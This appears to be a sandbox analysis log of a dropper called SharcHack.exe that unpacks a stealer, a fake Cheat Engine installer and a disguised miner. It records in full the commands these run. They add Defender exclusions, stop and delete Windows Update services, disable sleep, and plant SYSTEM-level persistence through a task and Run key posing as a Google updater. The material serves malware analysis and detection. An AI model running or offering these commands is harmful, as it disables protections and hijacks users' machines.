                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                                  Source: unknownProcess created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe ubulqosn
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                  Source: C:\Users\user\Desktop\SharcHack.exeProcess created: C:\Users\user\AppData\Local\Temp\3.exe "C:\Users\user\AppData\Local\Temp\3.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeProcess created: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe "C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeProcess created: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe "C:\Users\user\AppData\Local\Temp\CheatEngine75.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /fJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeProcess created: C:\Users\user\AppData\Local\Temp\v2.exe "C:\Users\user\AppData\Local\Temp\v2.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exeProcess created: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp "C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp" /SL5="$50416,29079073,832512,C:\Users\user\AppData\Local\Temp\CheatEngine75.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpProcess created: unknown unknownJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpProcess created: unknown unknownJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpProcess created: unknown unknownJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpProcess created: unknown unknownJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                  Source: C:\Windows\System32\conhost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\conhost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\conhost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
